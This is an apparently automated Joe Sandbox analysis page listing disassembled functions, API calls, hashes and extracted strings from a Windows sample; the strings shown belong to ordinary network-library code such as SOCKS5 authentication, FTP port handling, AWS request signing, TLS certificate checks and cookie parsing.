Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9706af448fe7867667ff6fecb8a78ab0d2c8a5ee2eb7993fb13eb1bca8668072
Instruction ID: 0a3fe074b351efd532f2ff14611c23b004892b4be438127d4451231a022cad5b
Opcode Fuzzy Hash: 9706af448fe7867667ff6fecb8a78ab0d2c8a5ee2eb7993fb13eb1bca8668072
Instruction Fuzzy Hash: 4A01A221B08B8581EF50AB97A840069A250AF55FF4F544335EE7C477DADF6CD0418380

Function 00007FF7F132CC4C Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,00007FF7F132C677), ref: 00007FF7F132CC55

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 27d459cd3c3b2774064e6a02e7790fba9ae193bdb70d2539e478f3a30ca76f40
Instruction ID: 5769c6569e2674717df6a19bd1b543ccf0829986c1b33c9958d3b3f17309d0e0
Opcode Fuzzy Hash: 27d459cd3c3b2774064e6a02e7790fba9ae193bdb70d2539e478f3a30ca76f40
Instruction Fuzzy Hash: BAD01292F0654AC3FF5D279224491318291AF0DBE4F8C5038CE2C0A3D0DF6CA5E69768

Function 00007FF7F12ED920 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FF7F12ED939

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 024b6feaba463d9576e4ca282350fa309f53f38a7987d7dd162b6d029466228a
Instruction ID: 2dd83542eb9d53034978f5686012afc0404f3793c0511b778f7e2f1696614e74
Opcode Fuzzy Hash: 024b6feaba463d9576e4ca282350fa309f53f38a7987d7dd162b6d029466228a
Instruction Fuzzy Hash: 8BC08056F14581C3C3456F615485097A771FFC4204FD55439D10741228DF3CD2A5DB44

Function 00007FF7F131B604 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF7F1316B40,?,?,?,?,?,?,00000001,?,?,?,00000001,00007FF7F13169F6), ref: 00007FF7F131B642

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 3c8909d93344aa893642bc7e7a0d113f1a4436c06e1cb1835220bd2940c20baf
Instruction ID: c7594faf7ea811ea98e1b834f41fee0977a65650fb2657a8318f48e80d399776
Opcode Fuzzy Hash: 3c8909d93344aa893642bc7e7a0d113f1a4436c06e1cb1835220bd2940c20baf
Instruction Fuzzy Hash: D6F05E01E0D20683FF643B625944275D1A05F947B0F8A1A38DD3E952CADF9CE45045B2

Non-executed Functions

Function 00007FF7F12F7DD0 Relevance: 67.2, APIs: 4, Strings: 34, Instructions: 732networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF7F12F8097
htons.WS2_32 ref: 00007FF7F12F81B2
htons.WS2_32 ref: 00007FF7F12F86A3
htons.WS2_32 ref: 00007FF7F12F87FD

Strings

Failed to receive SSPI encryption type., xrefs: 00007FF7F12F89BA
Failed to send SSPI encryption request., xrefs: 00007FF7F12F89FC
rcmd, xrefs: 00007FF7F12F7DFE
Failed to receive SSPI authentication response., xrefs: 00007FF7F12F8335
out GSS-API data, xrefs: 00007FF7F12F8987
Invalid SSPI authentication response type (%u %u)., xrefs: 00007FF7F12F8303
%s/%s, xrefs: 00007FF7F12F7EC5
SOCKS5 access with%s protection granted., xrefs: 00007FF7F12F89A4
QueryCredentialAttributes, xrefs: 00007FF7F12F8382
AcquireCredentialsHandle, xrefs: 00007FF7F12F7F77
QueryContextAttributes, xrefs: 00007FF7F12F8483
Failed to acquire credentials., xrefs: 00007FF7F12F7F8C
Failed to send SSPI authentication token., xrefs: 00007FF7F12F8224
integrity, xrefs: 00007FF7F12F8432
GSS-API integrity, xrefs: 00007FF7F12F8992
SOCKS5 server authenticated user %s with GSS-API., xrefs: 00007FF7F12F83E2
EncryptMessage, xrefs: 00007FF7F12F854D
User was rejected by the SOCKS5 server (%u %u)., xrefs: 00007FF7F12F8312, 00007FF7F12F87BD
GSS-API confidentiality, xrefs: 00007FF7F12F8999
InitializeSecurityContext, xrefs: 00007FF7F12F8068
Invalid SSPI encryption response type (%u %u)., xrefs: 00007FF7F12F87E1
Failed to query security context attributes., xrefs: 00007FF7F12F85A3
Failed to receive SSPI encryption response., xrefs: 00007FF7F12F89DF
Failed to send SSPI encryption type., xrefs: 00007FF7F12F872A, 00007FF7F12F89F3
Failed to initialise security context., xrefs: 00007FF7F12F8A66
(unknown), xrefs: 00007FF7F12F83DB
Kerberos, xrefs: 00007FF7F12F7EEC
Failed to send SSPI authentication request., xrefs: 00007FF7F12F822D
DecryptMessage, xrefs: 00007FF7F12F8893
Invalid SSPI encryption response length (%lu)., xrefs: 00007FF7F12F88DA, 00007FF7F12F8934
confidentiality, xrefs: 00007FF7F12F8439
Failed to receive SSPI authentication token., xrefs: 00007FF7F12F8295
Failed to determine username., xrefs: 00007FF7F12F83B6
SOCKS5 server supports GSS-API %s data protection., xrefs: 00007FF7F12F844D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: htons
String ID: GSS-API confidentiality$ GSS-API integrity$%s/%s$(unknown)$AcquireCredentialsHandle$DecryptMessage$EncryptMessage$Failed to acquire credentials.$Failed to determine username.$Failed to initialise security context.$Failed to query security context attributes.$Failed to receive SSPI authentication response.$Failed to receive SSPI authentication token.$Failed to receive SSPI encryption response.$Failed to receive SSPI encryption type.$Failed to send SSPI authentication request.$Failed to send SSPI authentication token.$Failed to send SSPI encryption request.$Failed to send SSPI encryption type.$InitializeSecurityContext$Invalid SSPI authentication response type (%u %u).$Invalid SSPI encryption response length (%lu).$Invalid SSPI encryption response type (%u %u).$Kerberos$QueryContextAttributes$QueryCredentialAttributes$SOCKS5 access with%s protection granted.$SOCKS5 server authenticated user %s with GSS-API.$SOCKS5 server supports GSS-API %s data protection.$User was rejected by the SOCKS5 server (%u %u).$confidentiality$integrity$out GSS-API data$rcmd
API String ID: 4207154920-3336745200
Opcode ID: c95fbea183440e57502aedaaf381d56e2e801a92193c7b1a7e60c6035e1a2ff2
Instruction ID: 92c4b906d305a14a9e7f12424ded359acc8af36a5280a002c7aef173ed93f5cf
Opcode Fuzzy Hash: c95fbea183440e57502aedaaf381d56e2e801a92193c7b1a7e60c6035e1a2ff2
Instruction Fuzzy Hash: F2724E36B08B42C6EB54AF66D8506B9A7A0FF44B84F810036DA6D837E4DFBCE445D790

Function 00007FF7F12DE270 Relevance: 54.8, APIs: 11, Strings: 20, Instructions: 548networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FF7F12DE50B
WSAGetLastError.WS2_32 ref: 00007FF7F12DE515
WSAGetLastError.WS2_32 ref: 00007FF7F12DE604
htons.WS2_32 ref: 00007FF7F12DE6A3
bind.WS2_32 ref: 00007FF7F12DE6BD
WSAGetLastError.WS2_32 ref: 00007FF7F12DE6CB
getsockname.WS2_32 ref: 00007FF7F12DE720

Part of subcall function 00007FF7F12C5AB0: GetLastError.KERNEL32(?,?,?,?,?,00007FF7F12ADC46), ref: 00007FF7F12C5AD3

Strings

[%s] -> [%s], xrefs: 00007FF7F12DEA73, 00007FF7F12DEAF8
failed to resolve the address provided to PORT: %s, xrefs: 00007FF7F12DEA8F
,%d,%d, xrefs: 00007FF7F12DE98C
socket failure: %s, xrefs: 00007FF7F12DE62A, 00007FF7F12DE826
getsockname() failed: %s, xrefs: 00007FF7F12DE52F
bind(port=%hu) on non-local address failed: %s, xrefs: 00007FF7F12DE6F8
???, xrefs: 00007FF7F12DE65B, 00007FF7F12DE7C7, 00007FF7F12DEAE7
Failure sending EPRT command: %s, xrefs: 00007FF7F12DEA55
STOP, xrefs: 00007FF7F12DEAEE
%s %s, xrefs: 00007FF7F12DE9C0
PORT, xrefs: 00007FF7F12DE9B9
[%s] ftp_state_use_port(), listening on %d, xrefs: 00007FF7F12DE859
[%s] ftp_state_use_port(), socket bound to port %d, xrefs: 00007FF7F12DE7E6
EPRT, xrefs: 00007FF7F12DEA09
%s |%d|%s|%hu|, xrefs: 00007FF7F12DEA14
bind() failed, we ran out of ports, xrefs: 00007FF7F12DE754
bind(port=%hu) failed: %s, xrefs: 00007FF7F12DE783
PORT, xrefs: 00007FF7F12DEA69
[%s] ftp_state_use_port(), opened socket, xrefs: 00007FF7F12DE662
Failure sending PORT command: %s, xrefs: 00007FF7F12DE9E4

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$getsockname$bindhtons
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$PORT$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 3168297111-3852301498
Opcode ID: 7c87449af515f339415a60ddc62fe8c292cacbfc05c52449ed9d67934b627bb0
Instruction ID: fc2603d16f7912bb0fe04ba8cdbda7081ebdeecc832bfa1449bfc689e0eaffba
Opcode Fuzzy Hash: 7c87449af515f339415a60ddc62fe8c292cacbfc05c52449ed9d67934b627bb0
Instruction Fuzzy Hash: 8732C662B0C79286EB50ABA5D4002BEB7A0FF45B54FC00136DAAD876D5DFBCE501D7A0

Function 00007FF7F130E284 Relevance: 50.9, APIs: 25, Strings: 3, Instructions: 1888COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F130E5BB
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F130E81E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F130EAE1
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F130ED81
memcpy_s.LIBCPMT ref: 00007FF7F130EF8E
memcpy_s.LIBCPMT ref: 00007FF7F130F02A
memcpy_s.LIBCPMT ref: 00007FF7F130F4E2
memcpy_s.LIBCPMT ref: 00007FF7F130F51D
memcpy_s.LIBCPMT ref: 00007FF7F130F649
memcpy_s.LIBCPMT ref: 00007FF7F130F770
memcpy_s.LIBCPMT ref: 00007FF7F130F81B
memcpy_s.LIBCPMT ref: 00007FF7F130F863
memcpy_s.LIBCPMT ref: 00007FF7F130F88D
memcpy_s.LIBCPMT ref: 00007FF7F130F93E
memcpy_s.LIBCPMT ref: 00007FF7F130FB3E
memcpy_s.LIBCPMT ref: 00007FF7F130FB83
memcpy_s.LIBCPMT ref: 00007FF7F130FC3A
memcpy_s.LIBCPMT ref: 00007FF7F130FD67
memcpy_s.LIBCPMT ref: 00007FF7F130F432

Part of subcall function 00007FF7F1311370: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13113A2

memcpy_s.LIBCPMT ref: 00007FF7F130F4AD
memcpy_s.LIBCPMT ref: 00007FF7F130FF21

Strings

, xrefs: 00007FF7F130FCE7
%256s "%64[^"]", xrefs: 00007FF7F130E28A
, xrefs: 00007FF7F130FE14

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: memcpy_s$_invalid_parameter_noinfo
String ID: $ $%256s "%64[^"]"
API String ID: 2880407647-3012446791
Opcode ID: eca4200553b35554c3054b6b4dde3b6b05d4ef21a39fa10945ae8a33d053bf72
Instruction ID: 8c269902bf76e89f08332bd0b6425f12168c122e92df522909036b6981a8c869
Opcode Fuzzy Hash: eca4200553b35554c3054b6b4dde3b6b05d4ef21a39fa10945ae8a33d053bf72
Instruction Fuzzy Hash: 3503E572B182818BE7799F24D8407EAB7D5FF4478CF805139DA1A57BC4DB79AA00CB90

Function 00007FF7F12EF730 Relevance: 44.5, APIs: 1, Strings: 24, Instructions: 717COMMON

Download Yara Rule

Strings

aws-sigv4: too many query pairs in URL, xrefs: 00007FF7F12EFEEC
%s%s%s%s%s%.*s, xrefs: 00007FF7F12F001D
aws-sigv4: region too long in hostname, xrefs: 00007FF7F12EFA42
%s/%s/%s/%s, xrefs: 00007FF7F12F00BB
first aws-sigv4 provider cannot be empty, xrefs: 00007FF7F12EF954
%Y%m%dT%H%M%SZ, xrefs: 00007FF7F12EFD1C
AWS_SIGV4, xrefs: 00007FF7F12EF730
x-%s-content-sha256: %s, xrefs: 00007FF7F12EFC66
aws:amz, xrefs: 00007FF7F12EF90B
@, xrefs: 00007FF7F12EF9D0
aws_sigv4: picked region %s from host, xrefs: 00007FF7F12EFA81
@, xrefs: 00007FF7F12EFA3C
aws-sigv4: region missing in parameters and hostname, xrefs: 00007FF7F12EFA30
%64[^:]:%64[^:]:%64[^:]:%64s, xrefs: 00007FF7F12EF927
%s4-HMAC-SHA256%s%s%s, xrefs: 00007FF7F12F016A
Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s, xrefs: 00007FF7F12F03A0
%s4%s, xrefs: 00007FF7F12F01AA
aws-sigv4: service too long in hostname, xrefs: 00007FF7F12EF9D6
aws-sigv4: service missing in parameters and hostname, xrefs: 00007FF7F12EF9C1
x-%s-content-sha256, xrefs: 00007FF7F12EFAF2
aws, xrefs: 00007FF7F12EFAAF
Authorization, xrefs: 00007FF7F12EF75C
%s4_request, xrefs: 00007FF7F12F0084
aws_sigv4: picked service %s from host, xrefs: 00007FF7F12EFA00

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: %64[^:]:%64[^:]:%64[^:]:%64s$%Y%m%dT%H%M%SZ$%s%s%s%s%s%.*s$%s/%s/%s/%s$%s4%s$%s4-HMAC-SHA256%s%s%s$%s4_request$@$@$AWS_SIGV4$Authorization$Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s$aws$aws-sigv4: region missing in parameters and hostname$aws-sigv4: region too long in hostname$aws-sigv4: service missing in parameters and hostname$aws-sigv4: service too long in hostname$aws-sigv4: too many query pairs in URL$aws:amz$aws_sigv4: picked region %s from host$aws_sigv4: picked service %s from host$first aws-sigv4 provider cannot be empty$x-%s-content-sha256$x-%s-content-sha256: %s
API String ID: 0-627699795
Opcode ID: e511933d4f9b4214faa954d2774ea04221b251763cf51fee03578e4945d39faf
Instruction ID: 27fe6271906945bf3ef39356e82e4ec91705067022e832269a3bc9dbb01f2cc9
Opcode Fuzzy Hash: e511933d4f9b4214faa954d2774ea04221b251763cf51fee03578e4945d39faf
Instruction Fuzzy Hash: 40729462B18BC285EB20EF60D8503F9A7A0FB55388F805136DA5D876D9EFBCD645C390

Function 00007FF7F12CFEC0 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 336networkCOMMON

Download Yara Rule

APIs

WSACreateEvent.WS2_32 ref: 00007FF7F12CFFC7
WSAGetLastError.WS2_32 ref: 00007FF7F12CFFDA

Strings

WSAEnumNetworkEvents failed (%d), xrefs: 00007FF7F12D01F9
WSACloseEvent failed (%d), xrefs: 00007FF7F12D042A
Time-out, xrefs: 00007FF7F12D03FA
WSACreateEvent failed (%d), xrefs: 00007FF7F12CFFE0

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
API String ID: 545576003-1941740749
Opcode ID: 51213f7343efc5abd71ae55334322dbb76e8153d1cce3eab86992519c7d622a2
Instruction ID: e8bf7ec949768931ce7b50b7d9771c39d768bef2d67c96c6bae1771f6a5a8ebc
Opcode Fuzzy Hash: 51213f7343efc5abd71ae55334322dbb76e8153d1cce3eab86992519c7d622a2
Instruction Fuzzy Hash: 6FE1A632B0868286F764AB65D4507BEB3A0FB44784F844135DE6E876E4DFBEE440C7A4

Function 00007FF7F12B7AC0 Relevance: 30.1, APIs: 10, Strings: 7, Instructions: 309networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF7F12B7C76
htons.WS2_32 ref: 00007FF7F12B7DD1
htons.WS2_32 ref: 00007FF7F12B7E21
WSAGetLastError.WS2_32 ref: 00007FF7F12B7E48
htons.WS2_32 ref: 00007FF7F12B7E9D
htons.WS2_32 ref: 00007FF7F12B7EC1
bind.WS2_32 ref: 00007FF7F12B7EE7
htons.WS2_32 ref: 00007FF7F12B7F20
bind.WS2_32 ref: 00007FF7F12B7F36
WSAGetLastError.WS2_32 ref: 00007FF7F12B7F7F

Strings

Local Interface %s is ip %s using address family %i, xrefs: 00007FF7F12B7C2A
Bind to local port %d failed, trying next, xrefs: 00007FF7F12B7F0B
Local port: %hu, xrefs: 00007FF7F12B7F44
Name '%s' family %i resolved to '%s' family %i, xrefs: 00007FF7F12B7D54
Couldn't bind to '%s' with errno %d: %s, xrefs: 00007FF7F12B7E75
bind failed with errno %d: %s, xrefs: 00007FF7F12B7FA4
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00007FF7F12B7CA3

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: htons$ErrorLast$bind
String ID: Bind to local port %d failed, trying next$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s
API String ID: 662734591-2129795902
Opcode ID: 6d487065223fef661e00cc74092a986b0319b1a8cdf697431ed4d7f8bcc7ca22
Instruction ID: f94c5f5fa76184dcf67459c7816fe001e496c006ca32a95ae79cad8d263a9d88
Opcode Fuzzy Hash: 6d487065223fef661e00cc74092a986b0319b1a8cdf697431ed4d7f8bcc7ca22
Instruction Fuzzy Hash: 33D19662B0878286FB14EB69D4502B9A7A0FF48794F801139EE5D877E5DFBCE540C790

Function 00007FF7F12F1AA0 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 240encryptionCOMMON

Download Yara Rule

APIs

CertGetNameStringA.CRYPT32 ref: 00007FF7F12F1B8F
CertFindExtension.CRYPT32 ref: 00007FF7F12F1C04
CryptDecodeObjectEx.CRYPT32 ref: 00007FF7F12F1C5A
CertFreeCertificateContext.CRYPT32 ref: 00007FF7F12F1E46

Strings

schannel: Empty DNS name., xrefs: 00007FF7F12F1C9A
schannel: CertGetNameString() returned no certificate name information, xrefs: 00007FF7F12F1CD3
schannel: server certificate name verification failed, xrefs: 00007FF7F12F1DE7
schannel: CertFindExtension() returned no extension., xrefs: 00007FF7F12F1C0F
schannel: Null certificate info., xrefs: 00007FF7F12F1BE7
schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 00007FF7F12F1D9A
2.5.29.17, xrefs: 00007FF7F12F1BF7, 00007FF7F12F1C29
schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 00007FF7F12F1E71
schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 00007FF7F12F1D03
schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 00007FF7F12F1C64
schannel: Null certificate context., xrefs: 00007FF7F12F1BA6
schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 00007FF7F12F1D8A
schannel: Failed to read remote certificate context: %s, xrefs: 00007FF7F12F1E9A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Cert$CertificateContextCryptDecodeExtensionFindFreeNameObjectString
String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Failed to read remote certificate context: %s$schannel: Null certificate context.$schannel: Null certificate info.$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
API String ID: 1682959454-2028687885
Opcode ID: 9d8ae8c013542bcde4adf99e186dabcaf831f72897c72aa844f91d64041bad74
Instruction ID: 00055370c4917fea271a49c1c3c64ae856d6d3bb24b1bc878e853f45c1ad582d
Opcode Fuzzy Hash: 9d8ae8c013542bcde4adf99e186dabcaf831f72897c72aa844f91d64041bad74
Instruction Fuzzy Hash: 6CB18E35B08A8282EB10AB55E4402B9B7A1FB45BE0FD00235DE7E877D5DFBCE5458790

Function 00007FF7F129DED0 Relevance: 29.5, Strings: 23, Instructions: 783COMMON

Download Yara Rule

Strings

;=, xrefs: 00007FF7F129DFE9
max-age, xrefs: 00007FF7F129E453
;, xrefs: 00007FF7F129E034
cookie '%s' for domain '%s' dropped, would overlay an existing cookie, xrefs: 00007FF7F129EC08
__Secure-, xrefs: 00007FF7F129E0FD
path, xrefs: 00007FF7F129E27B
version, xrefs: 00007FF7F129E43D
secure, xrefs: 00007FF7F129E20C
TRUE, xrefs: 00007FF7F129E724
cookie contains TAB, dropping, xrefs: 00007FF7F129E0A6
%s cookie %s="%s" for domain %s, path %s, expire %lld, xrefs: 00007FF7F129EC4E
localhost, xrefs: 00007FF7F129E31A
expires, xrefs: 00007FF7F129E529
oversized cookie dropped, name/val %zu + %zu bytes, xrefs: 00007FF7F129E5BD
httponly, xrefs: 00007FF7F129E24D
domain, xrefs: 00007FF7F129E2E6
invalid octets in name/value, cookie dropped, xrefs: 00007FF7F129E1BD
skipped cookie with bad tailmatch domain: %s, xrefs: 00007FF7F129E40B
#HttpOnly_, xrefs: 00007FF7F129E6A2
Added, xrefs: 00007FF7F129EC44
__Host-, xrefs: 00007FF7F129E11C
FALSE, xrefs: 00007FF7F129E72B, 00007FF7F129E928
Replaced, xrefs: 00007FF7F129EC38

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Time$FileSystem
String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$domain$expires$httponly$invalid octets in name/value, cookie dropped$localhost$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
API String ID: 2086374402-1562354863
Opcode ID: 73a7d42cefd9380d410c671d9e8b545f8758e5498e593acdf3a40c8b91da4c51
Instruction ID: 1d560c35bba30e4b44d1dfd8c0ba2ab29fd486aa475f763f4c0ec9ecc0ed652a
